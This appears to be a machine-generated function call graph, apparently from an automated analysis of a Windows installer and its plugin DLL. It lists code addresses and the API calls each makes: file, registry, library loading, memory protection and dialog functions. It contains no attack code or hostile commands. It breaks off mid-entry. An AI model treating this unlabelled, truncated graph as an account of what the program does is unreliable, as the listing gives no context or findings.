CreateFontIndirectW 5704->5705 5706 40265d 5705->5706 5707 402975 5708 402dcb 21 API calls 5707->5708 5709 402981 5708->5709 5710 402997 5709->5710 5711 402dcb 21 API calls 5709->5711 5712 40616d 2 API calls 5710->5712 5711->5710 5713 40299d 5712->5713 5735 406192 GetFileAttributesW CreateFileW 5713->5735 5715 4029aa 5716 402a60 5715->5716 5717 4029c5 GlobalAlloc 5715->5717 5718 402a48 5715->5718 5719 402a67 DeleteFileW 5716->5719 5720 402a7a 5716->5720 5717->5718 5721 4029de 5717->5721 5722 403396 48 API calls 5718->5722 5719->5720 5736 40361d SetFilePointer 5721->5736 5724 402a55 CloseHandle 5722->5724 5724->5716 5725 4029e4 5726 403607 ReadFile 5725->5726 5727 4029ed GlobalAlloc 5726->5727 5728 402a31 5727->5728 5729 4029fd 5727->5729 5730 406244 WriteFile 5728->5730 5731 403396 48 API calls 5729->5731 5732 402a3d GlobalFree 5730->5732 5734 402a0a 5731->5734 5732->5718 5733 402a28 GlobalFree 5733->5728 5734->5733 5735->5715 5736->5725 5737 4014f5 SetForegroundWindow 5738 402c4f 5737->5738 5753 738b103d 5754 738b101b 5 API calls 5753->5754 5755 738b1056 5754->5755 5756 40197b 5757 402dcb 21 API calls 5756->5757 5758 401982 lstrlenW 5757->5758 5759 40265d 5758->5759 5232 4020fd 5233 40210f 5232->5233 5242 4021c1 5232->5242 5234 402dcb 21 API calls 5233->5234 5235 402116 5234->5235 5237 402dcb 21 API calls 5235->5237 5236 401423 28 API calls 5243 40231b 5236->5243 5238 40211f 5237->5238 5239 402135 LoadLibraryExW 5238->5239 5240 402127 GetModuleHandleW 5238->5240 5241 402146 5239->5241 5239->5242 5240->5239 5240->5241 5255 406b05 5241->5255 5242->5236 5246 402190 5248 405727 28 API calls 5246->5248 5247 402157 5249 402176 5247->5249 5250 40215f 5247->5250 5251 402167 5248->5251 5260 738b1817 5249->5260 5252 401423 28 API calls 5250->5252 5251->5243 5253 4021b3 FreeLibrary 5251->5253 5252->5251 5253->5243 5302 4066c4 WideCharToMultiByte 5255->5302 5257 406b22 5258 406b29 GetProcAddress 5257->5258 5259 402151 5257->5259 5258->5259 5259->5246 5259->5247 5261 738b184a 5260->5261 5303 738b1bff 5261->5303 5263 738b1851 5264 738b1976 5263->5264 5265 738b1869 5263->5265 5266 738b1862 5263->5266 5264->5251 5337 738b2480 5265->5337 5353 738b243e 5266->5353 5271 738b18af 5366 738b2655 5271->5366 5272 738b18cd 5275 738b191e 5272->5275 5276 738b18d3 5272->5276 5273 738b1898 5289 738b188e 5273->5289 5363 738b2e23 5273->5363 5274 738b187f 5278 738b1885 5274->5278 5283 738b1890 5274->5283 5281 738b2655 10 API calls 5275->5281 5385 738b1666 5276->5385 5278->5289 5347 738b2b98 5278->5347 5287 738b190f 5281->5287 5282 738b18b5 5377 738b1654 5282->5377 5357 738b2810 5283->5357 5293 738b1965 5287->5293 5391 738b2618 5287->5391 5289->5271 5289->5272 5290 738b1896 5290->5289 5291 738b2655 10 API calls 5291->5287 5293->5264 5295 738b196f GlobalFree 5293->5295 5295->5264 5299 738b1951 5299->5293 5395 738b15dd wsprintfW 5299->5395 5301 738b194a FreeLibrary 5301->5299 5302->5257 5398 738b12bb GlobalAlloc 5303->5398 5305 738b1c26 5399 738b12bb GlobalAlloc 5305->5399 5307 738b1e6b GlobalFree GlobalFree GlobalFree 5308 738b1e88 5307->5308 5321 738b1ed2 5307->5321 5311 738b227e 5308->5311 5312 738b1e9d 5308->5312 5308->5321 5309 738b1c31 5309->5307 5310 738b1d26 GlobalAlloc 5309->5310 5313 738b21ae 5309->5313 5315 738b1d71 lstrcpyW 5309->5315 5316 738b1d8f GlobalFree 5309->5316 5320 738b1d7b lstrcpyW 5309->5320 5309->5321 5324 738b2126 5309->5324 5328 738b2067 GlobalFree 5309->5328 5331 738b12cc 2 API calls 5309->5331 5332 738b1dcd 5309->5332 5310->5309 5314 738b22a0 GetModuleHandleW 5311->5314 5311->5321 5312->5321 5402 738b12cc 5312->5402 5313->5321 5334 738b2216 lstrcpyW 5313->5334 5317 738b22b1 LoadLibraryW 5314->5317 5318 738b22c6 5314->5318 5315->5320 5316->5309 5317->5318 5317->5321 5406 738b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5318->5406 5320->5309 5321->5263 5322 738b2318 5322->5321 5327 738b2325 lstrlenW 5322->5327 5323 738b22d8 5323->5322 5335 738b2302 GetProcAddress 5323->5335 5405 738b12bb GlobalAlloc 5324->5405 5407 738b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5327->5407 5328->5309 5330 738b233f 5330->5321 5331->5309 5332->5309 5400 738b162f GlobalSize GlobalAlloc 5332->5400 5334->5321 5335->5322 5336 738b212f 5336->5263 5344 738b2498 5337->5344 5339 738b25c1 GlobalFree 5340 738b186f 5339->5340 5339->5344 5340->5273 5340->5274 5340->5289 5341 738b256b GlobalAlloc CLSIDFromString 5341->5339 5342 738b2540 GlobalAlloc WideCharToMultiByte 5342->5339 5343 738b12cc GlobalAlloc lstrcpynW 5343->5344 5344->5339 5344->5341 5344->5342 5344->5343 5346 738b258a 5344->5346 5409 738b135a 5344->5409 5346->5339 5413 738b27a4 5346->5413 5348 738b2baa 5347->5348 5349 738b2c4f SetFilePointer 5348->5349 5352 738b2c6d 5349->5352 5351 738b2d39 5351->5289 5416 738b2b42 5352->5416 5354 738b2453 5353->5354 5355 738b1868 5354->5355 5356 738b245e GlobalAlloc 5354->5356 5355->5265 5356->5354 5361 738b2840 5357->5361 5358 738b28db GlobalAlloc 5362 738b28fe 5358->5362 5359 738b28ee 5360 738b28f4 GlobalSize 5359->5360 5359->5362 5360->5362 5361->5358 5361->5359 5362->5290 5364 738b2e2e 5363->5364 5365 738b2e6e GlobalFree 5364->5365 5420 738b12bb GlobalAlloc 5366->5420 5368 738b270b lstrcpynW 5374 738b265f 5368->5374 5369 738b26fa StringFromGUID2 5369->5374 5370 738b26d8 MultiByteToWideChar 5370->5374 5371 738b271e wsprintfW 5371->5374 5372 738b2742 GlobalFree 5372->5374 5373 738b2777 GlobalFree 5373->5282 5374->5368 5374->5369 5374->5370 5374->5371 5374->5372 5374->5373 5375 738b1312 2 API calls 5374->5375 5421 738b1381 5374->5421 5375->5374 5425 738b12bb GlobalAlloc 5377->5425 5379 738b1659 5380 738b1666 2 API calls 5379->5380 5381 738b1663 5380->5381 5382 738b1312 5381->5382 5383 738b131b GlobalAlloc lstrcpynW 5382->5383 5384 738b1355 GlobalFree 5382->5384 5383->5384 5384->5287 5386 738b169f lstrcpyW 5385->5386 5387 738b1672 wsprintfW 5385->5387 5390 738b16b8 5386->5390 5387->5390 5390->5291 5392 738b2626 5391->5392 5394 738b1931 5391->5394 5393 738b2642 GlobalFree 5392->5393 5392->5394 5393->5392 5394->5299 5394->5301 5396 738b1312 2 API calls 5395->5396 5397 738b15fe 5396->5397 5397->5293 5398->5305 5399->5309 5401 738b164d 5400->5401 5401->5332 5408 738b12bb GlobalAlloc 5402->5408 5404 738b12db lstrcpynW 5404->5321 5405->5336 5406->5323 5407->5330 5408->5404 5410 738b1361 5409->5410 5411 738b12cc 2 API calls 5410->5411 5412 738b137f 5411->5412 5412->5344 5414 738b2808 5413->5414 5415 738b27b2 VirtualAlloc 5413->5415 5414->5346 5415->5414 5417 738b2b4d 5416->5417 5418 738b2b5d 5417->5418 5419 738b2b52 GetLastError 5417->5419 5418->5351 5419->5418 5420->5374 5422 738b138a 5421->5422 5423 738b13ac 5421->5423 5422->5423 5424 738b1390 lstrcpyW 5422->5424 5423->5374 5424->5423 5425->5379 5767 402b7e 5768 402bd0 5767->5768 5769 402b85 5767->5769 5770 406a96 5 API calls 5768->5770 5771 402da9 21 API calls 5769->5771 5774 402bce 5769->5774 5772 402bd7 5770->5772 5773 402b93 5771->5773 5775 402dcb 21 API calls 5772->5775 5776 402da9 21 API calls 5773->5776 5777 402be0 5775->5777 5781 402b9f 5776->5781 5777->5774 5778 402be4 IIDFromString 5777->5778 5778->5774 5779 402bf3 5778->5779 5779->5774 5785 4066a2 lstrcpynW 5779->5785 5784 4065e9 wsprintfW 5781->5784 5782 402c10 CoTaskMemFree 5782->5774 5784->5774 5785->5782 5786 401000 5787 401037 BeginPaint GetClientRect 5786->5787 5788 40100c DefWindowProcW 5786->5788 5790 4010f3 5787->5790 5791 401179 5788->5791 5792 401073 CreateBrushIndirect FillRect DeleteObject 5790->5792 5793 4010fc 5790->5793 5792->5790 5794 401102 CreateFontIndirectW 5793->5794 5795 401167 EndPaint 5793->5795 5794->5795 5796 401112 6 API calls 5794->5796 5795->5791 5796->5795 5797 402a80 5798 402da9 21 API calls 5797->5798 5799 402a86 5798->5799 5800 402ac9 5799->5800 5801 402aad 5799->5801 5806 402953 5799->5806 5804 402ae3 5800->5804 5805 402ad3 5800->5805 5802 402ab2 5801->5802 5803 402ac3 5801->5803 5811 4066a2 lstrcpynW 5802->5811 5812 4065e9 wsprintfW 5803->5812 5808 4066df 21 API calls 5804->5808 5807 402da9 21 API calls 5805->5807 5807->5806 5808->5806 5811->5806 5812->5806 4322 401781 4328 402dcb 4322->4328 4326 40178f 4327 4061c1 2 API calls 4326->4327 4327->4326 4329 402dd7 4328->4329 4330 4066df 21 API calls 4329->4330 4331 402df8 4330->4331 4332 401788 4331->4332 4333 406950 5 API calls 4331->4333 4334 4061c1 4332->4334 4333->4332 4335 4061ce GetTickCount GetTempFileNameW 4334->4335 4336 406208 4335->4336 4337 406204 4335->4337 4336->4326 4337->4335 4337->4336 5813 401d82 5814 402da9 21 API calls 5813->5814 5815 401d93 SetWindowLongW 5814->5815 5816 402c4f 5815->5816 4448 401f03 4456 402da9 4448->4456 4450 401f09 4451 402da9 21 API calls 4450->4451 4452 401f15 4451->4452 4453 401f21 ShowWindow 4452->4453 4454 401f2c EnableWindow 4452->4454 4455 402c4f 4453->4455 4454->4455 4457 4066df 21 API calls 4456->4457 4458 402dbe 4457->4458 4458->4450 5817 401503 5818 401508 5817->5818 5819 40152e 5817->5819 5820 402da9 21 API calls 5818->5820 5820->5819 5821 402903 5822 40290b 5821->5822 5823 40290f FindNextFileW 5822->5823 5825 402921 5822->5825 5824 402968 5823->5824 5823->5825 5827 4066a2 lstrcpynW 5824->5827 5827->5825 5828 738b2d43 5829 738b2d5b 5828->5829 5830 738b162f 2 API calls 5829->5830 5831 738b2d76 5830->5831 5832 401588 5833 402bc9 5832->5833 5836 4065e9 wsprintfW 5833->5836 5835 402bce 5836->5835 5844 40198d 5845 402da9 21 API calls 5844->5845 5846 401994 5845->5846 5847 402da9 21 API calls 5846->5847 5848 4019a1 5847->5848 5849 402dcb 21 API calls 5848->5849 5850 4019b8 lstrlenW 5849->5850 5852 4019c9 5850->5852 5851 401a0a 5852->5851 5856 4066a2 lstrcpynW 5852->5856 5854 4019fa 5854->5851 5855 4019ff lstrlenW 5854->5855 5855->5851 5856->5854 4967 40508e GetDlgItem GetDlgItem 4968 4050e0 7 API calls 4967->4968 4983 405305 4967->4983 4969 405187 DeleteObject 4968->4969 4970 40517a SendMessageW 4968->4970 4971 405190 4969->4971 4970->4969 4973 40519f 4971->4973 4974 4051c7 4971->4974 4972 4053e7 4978 405493 4972->4978 4985 405686 4972->4985 4990 405440 SendMessageW 4972->4990 4975 4066df 21 API calls 4973->4975 4977 404621 22 API calls 4974->4977 4981 4051a9 SendMessageW SendMessageW 4975->4981 4976 4053c8 4976->4972 4986 4053d9 SendMessageW 4976->4986 4984 4051db 4977->4984 4979 4054a5 4978->4979 4980 40549d SendMessageW 4978->4980 4992 4054b7 ImageList_Destroy 4979->4992 4993 4054be 4979->4993 5001 4054ce 4979->5001 4980->4979 4981->4971 4982 405363 5026 404fdc SendMessageW 4982->5026 4983->4972 4983->4976 4983->4982 4989 404621 22 API calls 4984->4989 4987 404688 8 API calls 4985->4987 4986->4972 4991 405694 4987->4991 5005 4051ec 4989->5005 4990->4985 4995 405455 SendMessageW 4990->4995 4992->4993 4996 4054c7 GlobalFree 4993->4996 4993->5001 4994 405648 4994->4985 4999 40565a ShowWindow GetDlgItem ShowWindow 4994->4999 4998 405468 4995->4998 4996->5001 4997 4052c7 GetWindowLongW SetWindowLongW 5000 4052e0 4997->5000 5006 405479 SendMessageW 4998->5006 4999->4985 5002 4052e5 ShowWindow 5000->5002 5003 4052fd 5000->5003 5001->4994 5015 405509 5001->5015 5031 40505c 5001->5031 5024 404656 SendMessageW 5002->5024 5025 404656 SendMessageW 5003->5025 5004 405374 5004->4976 5005->4997 5007 4052c2 5005->5007 5010 40523f SendMessageW 5005->5010 5011 405291 SendMessageW 5005->5011 5012 40527d SendMessageW 5005->5012 5006->4978 5007->4997 5007->5000 5010->5005 5011->5005 5012->5005 5014 4052f8 5014->4985 5017 40554d 5015->5017 5019 405537 SendMessageW 5015->5019 5016 405613 5018 40561e InvalidateRect 5016->5018 5020 40562a 5016->5020 5017->5016 5021 4055ae 5017->5021 5022 4055c1 SendMessageW SendMessageW 5017->5022 5018->5020 5019->5017 5020->4994 5040 404f97 5020->5040 5021->5022 5022->5017 5024->5014 5025->4983 5027 40503b SendMessageW 5026->5027 5028 404fff GetMessagePos ScreenToClient SendMessageW 5026->5028 5029 405033 5027->5029 5028->5029 5030 405038 5028->5030 5029->5004 5030->5027 5043 4066a2 lstrcpynW 5031->5043 5033 40506f 5044 4065e9 wsprintfW 5033->5044 5035 405079 5036 40140b 2 API calls 5035->5036 5037 405082 5036->5037 5045 4066a2 lstrcpynW 5037->5045 5039 405089 5039->5015 5046 404ece 5040->5046 5042 404fac 5042->4994 5043->5033 5044->5035 5045->5039 5047 404ee7 5046->5047 5048 4066df 21 API calls 5047->5048 5049 404f4b 5048->5049 5050 4066df 21 API calls 5049->5050 5051 404f56 5050->5051 5052 4066df 21 API calls 5051->5052 5053 404f6c lstrlenW wsprintfW SetDlgItemTextW 5052->5053 5053->5042 5857 40168f 5858 402dcb 21 API calls 5857->5858 5859 401695 5858->5859 5860 4069ff 2 API calls 5859->5860 5861 40169b 5860->5861 5862 402b10 5863 402da9 21 API calls 5862->5863 5864 402b16 5863->5864 5865 4066df 21 API calls 5864->5865 5866 402953 5864->5866 5865->5866 5101 402711 5102 402da9 21 API calls 5101->5102 5103 402720 5102->5103 5104 40276a ReadFile 5103->5104 5105 406215 ReadFile 5103->5105 5106 402803 5103->5106 5107 4027aa MultiByteToWideChar 5103->5107 5108 40285f 5103->5108 5111 4027d0 SetFilePointer MultiByteToWideChar 5103->5111 5112 402870 5103->5112 5114 40285d 5103->5114 5104->5103 5104->5114 5105->5103 5106->5103 5106->5114 5115 406273 SetFilePointer 5106->5115 5107->5103 5124 4065e9 wsprintfW 5108->5124 5111->5103 5113 402891 SetFilePointer 5112->5113 5112->5114 5113->5114 5116 40628f 5115->5116 5119 4062a7 5115->5119 5117 406215 ReadFile 5116->5117 5118 40629b 5117->5118 5118->5119 5120 4062b0 SetFilePointer 5118->5120 5121 4062d8 SetFilePointer 5118->5121 5119->5106 5120->5121 5122 4062bb 5120->5122 5121->5119 5123 406244 WriteFile 5122->5123 5123->5119 5124->5114 5867 401491 5868 405727 28 API calls 5867->5868 5869 401498 5868->5869 5870 404791 lstrlenW 5871 4047b0 5870->5871 5872 4047b2 WideCharToMultiByte 5870->5872 5871->5872 5873 404b12 5874 404b3e 5873->5874 5875 404b4f 5873->5875 5934 405ce6 GetDlgItemTextW 5874->5934 5877 404b5b GetDlgItem 5875->5877 5883 404bba 5875->5883 5879 404b6f 5877->5879 5878 404b49 5881 406950 5 API calls 5878->5881 5885 404b83 SetWindowTextW 5879->5885 5890 40601c 4 API calls 5879->5890 5880 404c9e 5882 404e4d 5880->5882 5936 405ce6 GetDlgItemTextW 5880->5936 5881->5875 5889 404688 8 API calls 5882->5889 5883->5880 5883->5882 5886 4066df 21 API calls 5883->5886 5888 404621 22 API calls 5885->5888 5891 404c2e SHBrowseForFolderW 5886->5891 5887 404cce 5892 406079 18 API calls 5887->5892 5893 404b9f 5888->5893 5894 404e61 5889->5894 5895 404b79 5890->5895 5891->5880 5896 404c46 CoTaskMemFree 5891->5896 5897 404cd4 5892->5897 5898 404621 22 API calls 5893->5898 5895->5885 5899 405f71 3 API calls 5895->5899 5900 405f71 3 API calls 5896->5900 5937 4066a2 lstrcpynW 5897->5937 5901 404bad 5898->5901 5899->5885 5902 404c53 5900->5902 5935 404656 SendMessageW 5901->5935 5905 404c8a SetDlgItemTextW 5902->5905 5910 4066df 21 API calls 5902->5910 5905->5880 5906 404bb3 5908 406a96 5 API calls 5906->5908 5907 404ceb 5909 406a96 5 API calls 5907->5909 5908->5883 5917 404cf2 5909->5917 5911 404c72 lstrcmpiW 5910->5911 5911->5905 5914 404c83 lstrcatW 5911->5914 5912 404d33 5938 4066a2 lstrcpynW 5912->5938 5914->5905 5915 404d3a 5916 40601c 4 API calls 5915->5916 5918 404d40 GetDiskFreeSpaceW 5916->5918 5917->5912 5920 405fbd 2 API calls 5917->5920 5922 404d8b 5917->5922 5921 404d64 MulDiv 5918->5921 5918->5922 5920->5917 5921->5922 5923 404f97 24 API calls 5922->5923 5931 404dfc 5922->5931 5925 404de9 5923->5925 5924 404e1f 5939 404643 EnableWindow 5924->5939 5928 404dfe SetDlgItemTextW 5925->5928 5929 404dee 5925->5929 5926 40140b 2 API calls 5926->5924 5928->5931 5930 404ece 24 API calls 5929->5930 5930->5931 5931->5924 5931->5926 5932 404e3b 5932->5882 5933 404a6b SendMessageW 5932->5933 5933->5882 5934->5878 5935->5906 5936->5887 5937->5907 5938->5915 5939->5932 5940 738b1058 5942 738b1074 5940->5942 5941 738b10dd 5942->5941 5943 738b1092 5942->5943 5944 738b15b6 GlobalFree 5942->5944 5945 738b15b6 GlobalFree 5943->5945 5944->5943 5946 738b10a2 5945->5946 5947 738b10a9 GlobalSize 5946->5947 5948 738b10b2 5946->5948 5947->5948 5949 738b10c7 5948->5949 5950 738b10b6 GlobalAlloc 5948->5950 5952 738b10d2 GlobalFree 5949->5952 5951 738b15dd 3 API calls 5950->5951 5951->5949 5952->5941 5125 401794 5126 402dcb 21 API calls 5125->5126 5127 40179b 5126->5127 5128 4017c3 5127->5128 5129 4017bb 5127->5129 5166 4066a2 lstrcpynW 5128->5166 5165 4066a2 lstrcpynW 5129->5165 5132 4017ce 5134 405f71 3 API calls 5132->5134 5133 4017c1 5136 406950 5 API calls 5133->5136 5135 4017d4 lstrcatW 5134->5135 5135->5133 5154 4017e0 5136->5154 5137 40181c 5139 40616d 2 API calls 5137->5139 5138 4069ff 2 API calls 5138->5154 5139->5154 5141 4017f2 CompareFileTime 5141->5154 5142 4018b2 5144 405727 28 API calls 5142->5144 5143 401889 5145 405727 28 API calls 5143->5145 5162 40189e 5143->5162 5147 4018bc 5144->5147 5145->5162 5146 4066a2 lstrcpynW 5146->5154 5148 403396 48 API calls 5147->5148 5149 4018cf 5148->5149 5150 4018e3 SetFileTime 5149->5150 5151 4018f5 CloseHandle 5149->5151 5150->5151 5153 401906 5151->5153 5151->5162 5152 4066df 21 API calls 5152->5154 5155 40190b 5153->5155 5156 40191e 5153->5156 5154->5137 5154->5138 5154->5141 5154->5142 5154->5143 5154->5146 5154->5152 5159 405d02 MessageBoxIndirectW 5154->5159 5164 406192 GetFileAttributesW CreateFileW 5154->5164 5157 4066df 21 API calls 5155->5157 5158 4066df 21 API calls 5156->5158 5160 401913 lstrcatW 5157->5160 5161 401926 5158->5161 5159->5154 5160->5161 5161->5162 5163 405d02 MessageBoxIndirectW 5161->5163 5163->5162 5164->5154 5165->5133 5166->5132 5953 401a97 5954 402da9 21 API calls 5953->5954 5955 401aa0 5954->5955 5956 402da9 21 API calls 5955->5956 5957 401a45 5956->5957 5958 401598 5959 4015b1 5958->5959 5960 4015a8 ShowWindow 5958->5960 5961 4015bf ShowWindow 5959->5961 5962 402c4f 5959->5962 5960->5959 5961->5962 5963 402419 5964 402dcb 21 API calls 5963->5964 5965 402428 5964->5965 5966 402dcb 21 API calls 5965->5966 5967 402431 5966->5967 5968 402dcb 21 API calls 5967->5968 5969 40243b GetPrivateProfileStringW 5968->5969 5218 40569b 5219 4056ab 5218->5219 5220 4056bf 5218->5220 5221 4056b1 5219->5221 5222 405708 5219->5222 5223 4056c7 IsWindowVisible 5220->5223 5230 4056e7 5220->5230 5225 40466d SendMessageW 5221->5225 5224 40570d CallWindowProcW 5222->5224 5223->5222 5226 4056d4 5223->5226 5227 4056bb 5224->5227 5225->5227 5228 404fdc 5 API calls 5226->5228 5229 4056de 5228->5229 5229->5230 5230->5224 5231 40505c 4 API calls 5230->5231 5231->5222 5970 40201b 5971 402dcb 21 API calls 5970->5971 5972 402022 5971->5972 5973 4069ff 2 API calls 5972->5973 5974 402028 5973->5974 5976 402039 5974->5976 5977 4065e9 wsprintfW 5974->5977 5977->5976 5978 401b9c 5979 402dcb 21 API calls 5978->5979 5980 401ba3 5979->5980 5981 402da9 21 API calls 5980->5981 5982 401bac wsprintfW 5981->5982 5983 402c4f 5982->5983 5984 40149e 5985 4014ac PostQuitMessage 5984->5985 5986 4023c2 5984->5986 5985->5986 5987 4016a0 5988 402dcb 21 API calls 5987->5988 5989 4016a7 5988->5989 5990 402dcb 21 API calls 5989->5990 5991 4016b0 5990->5991 5992 402dcb 21 API calls 5991->5992 5993 4016b9 MoveFileW 5992->5993 5994 4016c5 5993->5994 5995 4016cc 5993->5995 5997 401423 28 API calls 5994->5997 5996 4069ff 2 API calls 5995->5996 5999 40231b 5995->5999 5998 4016db 5996->5998 5997->5999 5998->5999 6000 406462 40 API calls 5998->6000 6000->5994 4338 404122 4339 40413a 4338->4339 4340 40429b 4338->4340 4339->4340 4341 404146 4339->4341 4342 4042ec 4340->4342 4343 4042ac GetDlgItem GetDlgItem 4340->4343 4345 404151 SetWindowPos 4341->4345 4346 404164 4341->4346 4344 404346 4342->4344 4352 401389 2 API calls 4342->4352 4347 404621 22 API calls 4343->4347 4353 404296 4344->4353 4412 40466d 4344->4412 4345->4346 4349 40416d ShowWindow 4346->4349 4350 4041af 4346->4350 4351 4042d6 SetClassLongW 4347->4351 4354 404288 4349->4354 4355 40418d GetWindowLongW 4349->4355 4356 4041b7 DestroyWindow 4350->4356 4357 4041ce 4350->4357 4358 40140b 2 API calls 4351->4358 4361 40431e 4352->4361 4434 404688 4354->4434 4355->4354 4363 4041a6 ShowWindow 4355->4363 4364 4045cb 4356->4364 4359 4041d3 SetWindowLongW 4357->4359 4360 4041e4 4357->4360 4358->4342 4359->4353 4360->4354 4365 4041f0 GetDlgItem 4360->4365 4361->4344 4366 404322 SendMessageW 4361->4366 4363->4350 4364->4353 4371 4045db ShowWindow 4364->4371 4369 404201 SendMessageW IsWindowEnabled 4365->4369 4370 40421e 4365->4370 4366->4353 4367 40140b 2 API calls 4379 404358 4367->4379 4368 4045ac DestroyWindow EndDialog 4368->4364 4369->4353 4369->4370 4373 40422b 4370->4373 4376 404272 SendMessageW 4370->4376 4377 40423e 4370->4377 4385 404223 4370->4385 4371->4353 4372 4066df 21 API calls 4372->4379 4373->4376 4373->4385 4375 404621 22 API calls 4375->4379 4376->4354 4380 404246 4377->4380 4381 40425b 4377->4381 4378 404259 4378->4354 4379->4353 4379->4367 4379->4368 4379->4372 4379->4375 4402 4044ec DestroyWindow 4379->4402 4415 404621 4379->4415 4428 40140b 4380->4428 4382 40140b 2 API calls 4381->4382 4384 404262 4382->4384 4384->4354 4384->4385 4431 4045fa 4385->4431 4387 4043d3 GetDlgItem 4388 4043f0 ShowWindow KiUserCallbackDispatcher 4387->4388 4389 4043e8 4387->4389 4418 404643 EnableWindow 4388->4418 4389->4388 4391 40441a EnableWindow 4396 40442e 4391->4396 4392 404433 GetSystemMenu EnableMenuItem SendMessageW 4393 404463 SendMessageW 4392->4393 4392->4396 4393->4396 4396->4392 4419 404656 SendMessageW 4396->4419 4420 404103 4396->4420 4423 4066a2 lstrcpynW 4396->4423 4398 404492 lstrlenW 4399 4066df 21 API calls 4398->4399 4400 4044a8 SetWindowTextW 4399->4400 4424 401389 4400->4424 4402->4364 4403 404506 CreateDialogParamW 4402->4403 4403->4364 4404 404539 4403->4404 4405 404621 22 API calls 4404->4405 4406 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4405->4406 4407 401389 2 API calls 4406->4407 4408 40458a 4407->4408 4408->4353 4409 404592 ShowWindow 4408->4409 4410 40466d SendMessageW 4409->4410 4411 4045aa 4410->4411 4411->4364 4413 404685 4412->4413 4414 404676 SendMessageW 4412->4414 4413->4379 4414->4413 4416 4066df 21 API calls 4415->4416 4417 40462c SetDlgItemTextW 4416->4417 4417->4387 4418->4391 4419->4396 4421 4066df 21 API calls 4420->4421 4422 404111 SetWindowTextW 4421->4422 4422->4396 4423->4398 4426 401390 4424->4426 4425 4013fe 4425->4379 4426->4425 4427 4013cb MulDiv SendMessageW 4426->4427 4427->4426 4429 401389 2 API calls 4428->4429 4430 401420 4429->4430 4430->4385 4432 404601 4431->4432 4433 404607 SendMessageW 4431->4433 4432->4433 4433->4378 4435 40474b 4434->4435 4436 4046a0 GetWindowLongW 4434->4436 4435->4353 4436->4435 4437 4046b5 4436->4437 4437->4435 4438 4046e2 GetSysColor 4437->4438 4439 4046e5 4437->4439 4438->4439 4440 4046f5 SetBkMode 4439->4440 4441 4046eb SetTextColor 4439->4441 4442 404713 4440->4442 4443 40470d GetSysColor 4440->4443 4441->4440 4444 404724 4442->4444 4445 40471a SetBkColor 4442->4445 4443->4442 4444->4435 4446 404737 DeleteObject 4444->4446 4447 40473e CreateBrushIndirect 4444->4447 4445->4444 4446->4447 4447->4435 6001 738b23e9 6002 738b2453 6001->6002 6003 738b247d 6002->6003 6004 738b245e GlobalAlloc 6002->6004 6004->6002 6005 401a24 6006 402dcb 21 API calls 6005->6006 6007 401a2b 6006->6007 6008 402dcb 21 API calls 6007->6008 6009 401a34 6008->6009 6010 401a3b lstrcmpiW 6009->6010 6011 401a4d lstrcmpW 6009->6011 6012 401a41 6010->6012 6011->6012 6013 402324 6014 402dcb 21 API calls 6013->6014 6015 40232a 6014->6015 6016 402dcb 21 API calls 6015->6016 6017 402333 6016->6017 6018 402dcb 21 API calls 6017->6018 6019 40233c 6018->6019 6020 4069ff 2 API calls 6019->6020 6021 402345 6020->6021 6022 402356 lstrlenW lstrlenW 6021->6022 6023 402349 6021->6023 6025 405727 28 API calls 6022->6025 6024 405727 28 API calls 6023->6024 6027 402351 6023->6027 6024->6027 6026 402394 SHFileOperationW 6025->6026 6026->6023 6026->6027 6035 401da6 6036 401db9 GetDlgItem 6035->6036 6037 401dac 6035->6037 6039 401db3 6036->6039 6038 402da9 21 API calls 6037->6038 6038->6039 6040 401dfa GetClientRect LoadImageW SendMessageW 6039->6040 6041 402dcb 21 API calls 6039->6041 6043 401e58 6040->6043 6045 401e64 6040->6045 6041->6040 6044 401e5d DeleteObject 6043->6044 6043->6045 6044->6045 6046 4023a8 6047 4023af 6046->6047 6050 4023c2 6046->6050 6048 4066df 21 API calls 6047->6048 6049 4023bc 6048->6049 6049->6050 6051 405d02 MessageBoxIndirectW 6049->6051 6051->6050 6052 402c2a SendMessageW 6053 402c44 InvalidateRect 6052->6053 6054 402c4f 6052->6054 6053->6054 6055 738b10e1 6059 738b1111 6055->6059 6056 738b12b0 GlobalFree 6057 738b1240 GlobalFree 6057->6059 6058 738b11d7 GlobalAlloc 6058->6059 6059->6056 6059->6057 6059->6058 6060 738b12ab 6059->6060 6061 738b135a 2 API calls 6059->6061 6062 738b129a GlobalFree 6059->6062 6063 738b1312 2 API calls 6059->6063 6064 738b116b GlobalAlloc 6059->6064 6065 738b1381 lstrcpyW 6059->6065 6060->6056 6061->6059 6062->6059 6063->6059 6064->6059 6065->6059 5066 4024af 5067 402dcb 21 API calls 5066->5067 5068 4024c1 5067->5068 5069 402dcb 21 API calls 5068->5069 5070 4024cb 5069->5070 5083 402e5b 5070->5083 5073 402c4f 5074 402503 5076 40250f 5074->5076 5078 402da9 21 API calls 5074->5078 5075 402dcb 21 API calls 5077 4024f9 lstrlenW 5075->5077 5079 40252e RegSetValueExW 5076->5079 5080 403396 48 API calls 5076->5080 5077->5074 5078->5076 5081 402544 RegCloseKey 5079->5081 5080->5079 5081->5073 5084 402e76 5083->5084 5087 40653d 5084->5087 5088 40654c 5087->5088 5089 406557 RegCreateKeyExW 5088->5089 5090 4024db 5088->5090 5089->5090 5090->5073 5090->5074 5090->5075 5091 402930 5092 402dcb 21 API calls 5091->5092 5093 402937 FindFirstFileW 5092->5093 5094 40295f 5093->5094 5098 40294a 5093->5098 5095 402968 5094->5095 5099 4065e9 wsprintfW 5094->5099 5100 4066a2 lstrcpynW 5095->5100 5099->5095 5100->5098 6066 401931 6067 401968 6066->6067 6068 402dcb 21 API calls 6067->6068 6069 40196d 6068->6069 6070 405dae 71 API calls 6069->6070 6071 401976 6070->6071 6072 403d32 6073 403d3d 6072->6073 6074 403d41 6073->6074 6075 403d44 GlobalAlloc 6073->6075 6075->6074 6076 738b1979 6077 738b199c 6076->6077 6078 738b19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6077->6078 6079 738b19d1 GlobalFree 6077->6079 6080 738b1312 2 API calls 6078->6080 6079->6078 6081 738b1b6e GlobalFree GlobalFree 6080->6081 5167 738b2a7f 5168 738b2acf 5167->5168 5169 738b2a8f VirtualProtect 5167->5169 5169->5168 6089 401934 6090 402dcb 21 API calls 6089->6090 6091 40193b 6090->6091 6092 405d02 MessageBoxIndirectW 6091->6092 6093 401944 6092->6093 5170 4028b6 5171 4028bd 5170->5171 5172 402bce 5170->5172 5173 402da9 21 API 